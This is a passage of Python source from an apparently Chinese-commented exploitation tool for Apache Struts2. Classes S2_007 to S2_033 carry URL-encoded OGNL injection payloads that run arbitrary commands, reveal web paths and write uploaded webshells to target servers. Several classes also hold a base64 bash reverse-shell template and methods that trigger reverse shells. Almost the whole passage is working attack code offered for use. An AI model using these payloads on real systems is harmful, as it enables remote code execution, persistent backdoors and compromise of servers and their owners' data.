 403 |     exec_payload = "'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))%20%2B%20'"
 404 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 405 | 
 406 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 407 |         self.url = url
 408 |         if not data:
 409 |             self.data = "username=test&password={exp}"
 410 |         else:
 411 |             self.data = data
 412 |         self.headers = parse_headers(headers)
 413 |         self.encoding = encoding
 414 |         self.is_vul = False
 415 |         if 'Content-Type' not in self.headers:
 416 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
 417 | 
 418 |     def check(self):
 419 |         """检测漏洞是否存在"""
 420 |         html = echo_check(self)
 421 |         if str(html).startswith("ERROR:"):
 422 |             return html
 423 |         if html:
 424 |             self.is_vul = True
 425 |             return 'S2-007'
 426 |         return self.is_vul
 427 | 
 428 |     def exec_cmd(self, cmd):
 429 |         """执行命令"""
 430 |         data = self.data.format(exp=self.exec_payload.format(cmd=quote(cmd)))
 431 |         html = post_stream(self.url, data, self.headers, self.encoding)
 432 |         return html
 433 | 
 434 |     def reverse_shell(self, ip, port):
 435 |         """反弹shell"""
 436 |         html = reverse_shell(self, ip, port)
 437 |         return html
 438 | 
 439 | 
 440 | class S2_008:
 441 |     """S2-008漏洞检测利用类"""
 442 |     info = "[+] S2-008:影响版本Struts 2.1.0-2.3.1; GET请求发送数据; 支持任意命令执行和反弹shell"
 443 |     exec_payload = "/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29)"
 444 | 
 445 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 446 | 
 447 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 448 |         self.url = url
 449 |         self.headers = parse_headers(headers)
 450 |         self.encoding = encoding
 451 |         self.is_vul = False
 452 | 
 453 |     def check(self):
 454 |         """检测漏洞是否存在"""
 455 |         html = echo_check(self)
 456 |         if str(html).startswith("ERROR:"):
 457 |             return html
 458 |         if html:
 459 |             self.is_vul = True
 460 |             return 'S2-008'
 461 |         return self.is_vul
 462 | 
 463 |     def exec_cmd(self, cmd):
 464 |         """执行命令"""
 465 |         payload = self.exec_payload.format(cmd=quote(cmd))
 466 |         html = get(self.url + payload, self.headers, self.encoding)
 467 |         return html
 468 | 
 469 |     def reverse_shell(self, ip, port):
 470 |         """反弹shell"""
 471 |         html = reverse_shell(self, ip, port)
 472 |         return html
 473 | 
 474 | 
 475 | class S2_009:
 476 |     """S2-009漏洞检测利用类"""
 477 |     info = "[+] S2-009:影响版本Struts 2.0.0-2.3.1.1; GET请求发送数据,URL后面需要请求参数名; 默认为: key; 支持任意命令执行和反弹shell"
 478 |     exec_payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27{cmd}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[({key})(%27meh%27)]"
 479 | 
 480 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 481 | 
 482 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 483 |         self.url = url
 484 |         if not data:
 485 |             self.data = "key"
 486 |         else:
 487 |             self.data = data.split('=')[0].strip()
 488 |         self.headers = parse_headers(headers)
 489 |         self.encoding = encoding
 490 |         self.is_vul = False
 491 | 
 492 |     def check(self):
 493 |         """检测漏洞是否存在"""
 494 |         html = echo_check(self)
 495 |         if str(html).startswith("ERROR:"):
 496 |             return html
 497 |         if html:
 498 |             self.is_vul = True
 499 |             return 'S2-009'
 500 |         return self.is_vul
 501 | 
 502 |     def exec_cmd(self, cmd):
 503 |         """执行命令"""
 504 |         payload = self.exec_payload.format(cmd=quote(cmd), key=self.data)
 505 |         html = get(self.url + "&{key}={payload}".format(key=self.data, payload=payload), self.headers, self.encoding)
 506 |         return html
 507 | 
 508 |     def reverse_shell(self, ip, port):
 509 |         """反弹shell"""
 510 |         html = reverse_shell(self, ip, port)
 511 |         return html
 512 | 
 513 | 
 514 | class S2_012:
 515 |     """S2-012漏洞检测利用类"""
 516 |     info = "[+] S2-012:影响版本Struts Showcase App 2.0.0-2.3.13; GET请求发送数据,参数直接添加到URL后面; 默认为:name; 支持任意命令执行和反弹shell"
 517 |     exec_payload = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D"
 518 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 519 | 
 520 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 521 |         self.url = url
 522 |         self.headers = parse_headers(headers)
 523 |         self.encoding = encoding
 524 |         self.is_vul = False
 525 | 
 526 |     def check(self):
 527 |         """检测漏洞是否存在"""
 528 |         html = echo_check(self)
 529 |         if str(html).startswith("ERROR:"):
 530 |             return html
 531 |         if html:
 532 |             self.is_vul = True
 533 |             return 'S2-012'
 534 |         return self.is_vul
 535 | 
 536 |     def exec_cmd(self, cmd):
 537 |         """执行命令"""
 538 |         cmd = parse_cmd(cmd)
 539 |         payload = self.exec_payload.format(cmd=quote(cmd))
 540 |         html = get(self.url + payload, self.headers, self.encoding)
 541 |         return html
 542 | 
 543 |     def reverse_shell(self, ip, port):
 544 |         """反弹shell"""
 545 |         html = reverse_shell(self, ip, port)
 546 |         return html
 547 | 
 548 | 
 549 | class S2_013:
 550 |     """S2-013/S2-014漏洞检测利用类"""
 551 |     info = "[+] S2-013/S2-014:影响版本Struts 2.0.0-2.3.14.1; GET请求发送数据; 支持获取WEB路径,任意命令执行,反弹shell和文件上传"
 552 |     web_path = "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23k8out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23k8out.println(%23req.getRealPath(%22%2F%22))%2C%23k8out.close())%7D"
 553 |     exec_payload = "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D"
 554 |     upload_paylaod = "$%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23fos=%20new%20java.io.FileOutputStream(%23req.getParameter(%22f%22)),%23fos.write(%23req.getParameter(%22t%22).getBytes()),%23fos.close(),%23outstr.println(%22OK%22),%23outstr.close())%7D"
 555 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 556 | 
 557 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 558 |         self.url = url
 559 |         self.headers = parse_headers(headers)
 560 |         self.encoding = encoding
 561 |         self.is_vul = False
 562 |         if 'Content-Type' not in self.headers:
 563 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
 564 | 
 565 |     def check(self):
 566 |         """检测漏洞是否存在"""
 567 |         html = echo_check(self)
 568 |         if str(html).startswith("ERROR:"):
 569 |             return html
 570 |         if html:
 571 |             self.is_vul = True
 572 |             return 'S2-013'
 573 |         return self.is_vul
 574 | 
 575 |     def get_path(self):
 576 |         """获取web目录"""
 577 |         html = get(self.url + "?x={payload}".format(payload=self.web_path), self.headers, self.encoding)
 578 |         return html
 579 | 
 580 |     def exec_cmd(self, cmd):
 581 |         """执行命令"""
 582 |         html = get(self.url + "?x={payload}".format(payload=self.exec_payload.format(cmd=quote(cmd))), self.headers,
 583 |                    self.encoding)
 584 |         return html
 585 | 
 586 |     def reverse_shell(self, ip, port):
 587 |         """反弹shell"""
 588 |         html = reverse_shell(self, ip, port)
 589 |         return html
 590 | 
 591 |     def upload_shell(self, upload_path, shell_path):
 592 |         shell = read_file(shell_path, self.encoding)
 593 |         data = "t={t}&f={f}".format(t=quote(shell), f=upload_path)
 594 |         html = post(self.url + "?x={payload}".format(payload=self.upload_paylaod), data, self.headers, self.encoding)
 595 |         if html == 'OK':
 596 |             return True
 597 |         else:
 598 |             return False
 599 | 
 600 | 
 601 | class S2_015:
 602 |     """S2-015漏洞检测利用类"""
 603 |     info = "[+] S2-015:影响版本Struts 2.0.0-2.3.14.2; GET请求发送数据; 支持任意命令执行和反弹shell"
 604 |     exec_payload = "%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream())%2C%23q%7D"
 605 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 606 | 
 607 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 608 |         if url.endswith(".action"):
 609 |             rindex = url.rindex('/')
 610 |             self.url = url[:rindex + 1]
 611 |         elif url.endswith("/"):
 612 |             self.url = url
 613 |         else:
 614 |             self.url = url + '/'
 615 |         self.headers = parse_headers(headers)
 616 |         self.encoding = encoding
 617 |         self.is_vul = False
 618 | 
 619 |     def check(self):
 620 |         """检测漏洞是否存在"""
 621 |         html = echo_check(self)
 622 |         if str(html).startswith("ERROR:"):
 623 |             return html
 624 |         if html:
 625 |             self.is_vul = True
 626 |             return 'S2-015'
 627 |         return self.is_vul
 628 | 
 629 |     def exec_cmd(self, cmd):
 630 |         """执行命令"""
 631 |         payload = self.exec_payload.format(cmd=quote(cmd))
 632 |         html = get(self.url + "{payload}.action".format(payload=payload), self.headers, self.encoding)
 633 |         if html.startswith('ERROR:'):
 634 |             return html
 635 |         try:
 636 |             soup = BeautifulSoup(html, 'lxml')
 637 |             ps = soup.find_all('p')
 638 |             result = unquote(ps[1].text[9:-4]).strip()
 639 |             return result
 640 |         except Exception as e:
 641 |             return html
 642 | 
 643 |     def reverse_shell(self, ip, port):
 644 |         """反弹shell"""
 645 |         html = reverse_shell(self, ip, port)
 646 |         return html
 647 | 
 648 | 
 649 | class S2_016:
 650 |     """S2-016漏洞检测利用类"""
 651 |     info = "[+] S2-016:影响版本Struts 2.0.0-2.3.15; GET请求发送数据; 支持获取WEB路径,任意命令执行,反弹shell和文件上传"
 652 |     check_poc = "redirect%3A%24%7B{num1}%2B{num2}%7D"
 653 |     web_path = "redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D"
 654 |     exec_payload1 = "redirect%3A%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B{cmd}%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader%20(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println%20(%23e)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D"
 655 |     exec_payload2 = "redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22{cmd}%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D"
 656 |     exec_payload3 = r"redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27CMD%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27ENCODING%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
 657 |     upload_payload1 = r"""redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22O%22),%23res.getWriter().print(%22K%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%22PATH%22)).append(%23req.getParameter(%22t%22)).close()}&t=SHELL"""
 658 |     upload_payload2 = "redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22)%2C%23b%3Dnew%20java.io.FileOutputStream(new%20java.lang.StringBuilder(%23a.getRealPath(%22%2F%22)).append(%40java.io.File%40separator).append(%22{path}%22).toString())%2C%23b.write(%23a.getParameter(%22t%22).getBytes())%2C%23b.close()%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%22OK%22)%2C%23genxor.flush()%2C%23genxor.close()%7D"
 659 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 660 | 
 661 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 662 |         self.url = url
 663 |         self.headers = parse_headers(headers)
 664 |         self.encoding = encoding
 665 |         self.is_vul = False
 666 |         self.exec_payload = "payload1"
 667 |         self.exec_dict = {"payload1": self.exec_cmd1, "payload2": self.exec_cmd2, "payload3": self.exec_cmd3}
 668 |         if 'Content-Type' not in self.headers:
 669 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
 670 | 
 671 |     def check(self):
 672 |         """检测漏洞是否存在"""
 673 |         num1 = random.randint(10000, 100000)
 674 |         num2 = random.randint(10000, 100000)
 675 |         poc = self.check_poc.format(num1=num1, num2=num2)
 676 |         html = get(self.url + '?' + poc, self.headers, self.encoding)
 677 |         nn = str(num1 + num2)
 678 |         if html.startswith("ERROR:"):
 679 |             return html
 680 |         elif nn in html:
 681 |             self.is_vul = True
 682 |             self.select_exec()
 683 |             return 'S2-016'
 684 |         return self.is_vul
 685 | 
 686 |     def get_path(self):
 687 |         """获取web目录"""
 688 |         html = get(self.url + "?" + self.web_path, self.headers, self.encoding)
 689 |         return html
 690 | 
 691 |     def echo_check(self, exec_fun):
 692 |         """通过echo输出检查漏洞是否存在"""
 693 |         hash_str = get_hash()
 694 |         html = exec_fun("echo " + hash_str)
 695 |         if hash_str in html:
 696 |             return True
 697 |         else:
 698 |             return False
 699 | 
 700 |     def select_exec(self):
 701 |         """选择合适的执行命令的exp"""
 702 |         result = self.echo_check(self.exec_cmd1)
 703 |         if result:
 704 |             self.exec_payload = "payload1"
 705 |         else:
 706 |             result = self.echo_check(self.exec_cmd2)
 707 |             if result:
 708 |                 self.exec_payload = "payload2"
 709 |             else:
 710 |                 result = self.echo_check(self.exec_cmd3)
 711 |                 if result:
 712 |                     self.exec_payload = "payload3"
 713 |                 else:
 714 |                     self.exec_payload = "None"
 715 | 
 716 |     def exec_cmd(self, cmd):
 717 |         if self.exec_payload not in self.exec_dict:
 718 |             # print("[+] 本程序S2_016预设EXP对 {url} 无效!".format(url=self.url))
 719 |             return None
 720 |         result = self.exec_dict.get(self.exec_payload)(cmd)
 721 |         return result
 722 | 
 723 |     def exec_cmd1(self, cmd):
 724 |         """执行命令"""
 725 |         cmd = parse_cmd(cmd)
 726 |         html = get(self.url + "?" + self.exec_payload1.format(cmd=quote(cmd)), self.headers,
 727 |                    self.encoding)
 728 |         return html
 729 | 
 730 |     def exec_cmd2(self, cmd):
 731 |         """执行命令"""
 732 |         html = get(self.url + "?" + self.exec_payload2.format(cmd=quote(cmd)), self.headers,
 733 |                    self.encoding)
 734 |         return html
 735 | 
 736 |     def exec_cmd3(self, cmd):
 737 |         """执行命令"""
 738 |         html = get(self.url + "?" + self.exec_payload3.replace('CMD', quote(cmd)).replace('ENCODING', self.encoding),
 739 |                    self.headers, self.encoding)
 740 |         return html
 741 | 
 742 |     def reverse_shell(self, ip, port):
 743 |         """反弹shell"""
 744 |         html = reverse_shell(self, ip, port)
 745 |         return html
 746 | 
 747 |     def upload_shell1(self, upload_path, shell_path):
 748 |         shell = read_file(shell_path, self.encoding)
 749 |         data = self.upload_payload1.replace('PATH', quote(upload_path)).replace('SHELL', quote(shell))
 750 |         html = post(self.url, data, self.headers, self.encoding)
 751 |         if html == 'OK':
 752 |             return True
 753 |         else:
 754 |             return False
 755 | 
 756 |     def upload_shell2(self, upload_path, shell_path):
 757 |         shell = read_file(shell_path, self.encoding)
 758 |         data = "t=" + quote(shell)
 759 |         web_path = self.get_path()
 760 |         upload_path = upload_path.replace(web_path, '')
 761 |         html = post(self.url + '?' + self.upload_payload2.format(path=upload_path), data, self.headers, self.encoding)
 762 |         if html == 'OK':
 763 |             return True
 764 |         else:
 765 |             return False
 766 | 
 767 |     def upload_shell(self, upload_path, shell_path):
 768 |         result = self.upload_shell1(upload_path, shell_path)
 769 |         if not result:
 770 |             result = self.upload_shell2(upload_path, shell_path)
 771 |         return result
 772 | 
 773 | 
 774 | class S2_019:
 775 |     """S2-019漏洞检测利用类"""
 776 |     info = "[+] S2-019:影响版本Struts 2.0.0-2.3.15.1; GET请求发送数据; 支持获取WEB路径,任意命令执行,反弹shell和文件上传"
 777 |     web_path = "%23req%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')%2C%23resp%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23resp.setCharacterEncoding('{encoding}')%2C%23resp.getWriter().println(%23req.getSession().getServletContext().getRealPath('%2F'))%2C%23resp.getWriter().flush()%2C%23resp.getWriter().close()"
 778 |     exec_payload = "%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close()"
 779 |     upload_payload = r"""debug=command&expression=%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22O%22),%23res.getWriter().print(%22K%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%22{path}%22)).append(%23req.getParameter(%22shell%22)).close()&shell={shell}"""
 780 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 781 | 
 782 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 783 |         self.url = url
 784 |         self.headers = parse_headers(headers)
 785 |         self.encoding = encoding
 786 |         self.is_vul = False
 787 |         if 'Content-Type' not in self.headers:
 788 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
 789 | 
 790 |     def check(self):
 791 |         """检测漏洞是否存在"""
 792 |         html = echo_check(self)
 793 |         if str(html).startswith("ERROR:"):
 794 |             return html
 795 |         if html:
 796 |             self.is_vul = True
 797 |             return 'S2-019'
 798 |         return self.is_vul
 799 | 
 800 |     def get_path(self):
 801 |         """获取web目录"""
 802 |         html = get(self.url + "?debug=command&expression={payload}".format(
 803 |             payload=self.web_path.format(encoding=self.encoding)), self.headers, self.encoding)
 804 |         return html
 805 | 
 806 |     def exec_cmd(self, cmd):
 807 |         """执行命令"""
 808 |         cmd = parse_cmd(cmd)
 809 |         html = get(
 810 |             self.url + "?debug=command&expression={payload}".format(payload=self.exec_payload.format(cmd=quote(cmd))),
 811 |             self.headers,
 812 |             self.encoding)
 813 |         return html
 814 | 
 815 |     def reverse_shell(self, ip, port):
 816 |         """反弹shell"""
 817 |         html = reverse_shell(self, ip, port)
 818 |         return html
 819 | 
 820 |     def upload_shell(self, upload_path, shell_path):
 821 |         shell = read_file(shell_path, self.encoding)
 822 |         data = self.upload_payload.format(path=quote(upload_path), shell=quote(shell))
 823 |         html = post(self.url, data, self.headers, self.encoding)
 824 |         if html == 'OK':
 825 |             return True
 826 |         else:
 827 |             return False
 828 | 
 829 | 
 830 | class S2_029:
 831 |     """S2-029漏洞检测利用类"""
 832 |     info = "[+] S2-029:影响版本Struts 2.0.0-2.3.24.1(除了2.3.20.3); POST请求发送数据,需要参数; 默认参数:message; 支持任意命令执行和反弹shell"
 833 |     exec_payload = "(%23_memberAccess%5B'allowPrivateAccess'%5D%3Dtrue%2C%23_memberAccess%5B'allowProtectedAccess'%5D%3Dtrue%2C%23_memberAccess%5B'excludedPackageNamePatterns'%5D%3D%23_memberAccess%5B'acceptProperties'%5D%2C%23_memberAccess%5B'excludedClasses'%5D%3D%23_memberAccess%5B'acceptProperties'%5D%2C%23_memberAccess%5B'allowPackageProtectedAccess'%5D%3Dtrue%2C%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))"
 834 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 835 | 
 836 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 837 |         self.url = url
 838 |         self.headers = parse_headers(headers)
 839 |         if not data:
 840 |             self.data = "message={exp}"
 841 |         else:
 842 |             self.data = data
 843 |         self.encoding = encoding
 844 |         self.is_vul = False
 845 |         if 'Content-Type' not in self.headers:
 846 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
 847 | 
 848 |     def check(self):
 849 |         """检测漏洞是否存在"""
 850 |         html = echo_check(self)
 851 |         if str(html).startswith("ERROR:"):
 852 |             return html
 853 |         if html:
 854 |             self.is_vul = True
 855 |             return 'S2-029'
 856 |         return self.is_vul
 857 | 
 858 |     def exec_cmd(self, cmd):
 859 |         """执行命令"""
 860 |         data = self.data.format(exp=self.exec_payload.format(cmd=quote(cmd)))
 861 |         html = post(self.url, data, self.headers, self.encoding)
 862 |         return html
 863 | 
 864 |     def reverse_shell(self, ip, port):
 865 |         """反弹shell"""
 866 |         html = reverse_shell(self, ip, port)
 867 |         return html
 868 | 
 869 | 
 870 | class S2_032:
 871 |     """S2-032漏洞检测利用类"""
 872 |     info = "[+] S2-032:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET请求发送数据; 支持获取WEB路径,任意命令执行和反弹shell"
 873 |     check_poc = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086"
 874 |     web_path = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding={encoding}"
 875 |     exec_payload = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding={encoding}&cmd={cmd}"
 876 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 877 | 
 878 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 879 |         self.url = url
 880 |         self.headers = parse_headers(headers)
 881 |         self.encoding = encoding
 882 |         self.is_vul = False
 883 | 
 884 |     def check(self):
 885 |         """选择可以利用成功的payload"""
 886 |         html = get(self.url + '?' + self.check_poc, self.headers, self.encoding)
 887 |         if html.startswith("ERROR:"):
 888 |             return html
 889 |         elif html == "1008660253718":
 890 |             self.is_vul = True
 891 |             return 'S2-032'
 892 |         return self.is_vul
 893 | 
 894 |     def get_path(self):
 895 |         """获取web目录"""
 896 |         html = get(self.url + '?' + self.web_path.format(encoding=self.encoding), self.headers, self.encoding)
 897 |         return html
 898 | 
 899 |     def exec_cmd(self, cmd):
 900 |         """执行命令"""
 901 |         payload = self.exec_payload.format(cmd=quote(cmd), encoding=self.encoding)
 902 |         html = get_stream(self.url + '?' + payload, self.headers, self.encoding)
 903 |         return html
 904 | 
 905 |     def reverse_shell(self, ip, port):
 906 |         """反弹shell"""
 907 |         html = reverse_shell(self, ip, port)
 908 |         return html
 909 | 
 910 | 
 911 | class S2_033:
 912 |     """S2-033漏洞检测利用类"""
 913 |     info = "[+] S2-033:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET请求发送数据; 支持任意命令执行和反弹shell"
 914 |     check_poc = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086"
 915 |     exec_payload = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command={cmd}"
 916 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 917 | 
 918 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 919 |         if url.endswith('/'):
 920 |             self.url = url
 921 |         else:
 922 |             self.url = url + '/'
 923 |         self.headers = parse_headers(headers)
 924 |         self.encoding = encoding
 925 |         self.is_vul = False
 926 | 
 927 |     def check(self):
 928 |         """选择可以利用成功的payload"""
 929 |         html = get(self.url + self.check_poc, self.headers, self.encoding)
 930 |         if html.startswith("ERROR:"):
 931 |             return html
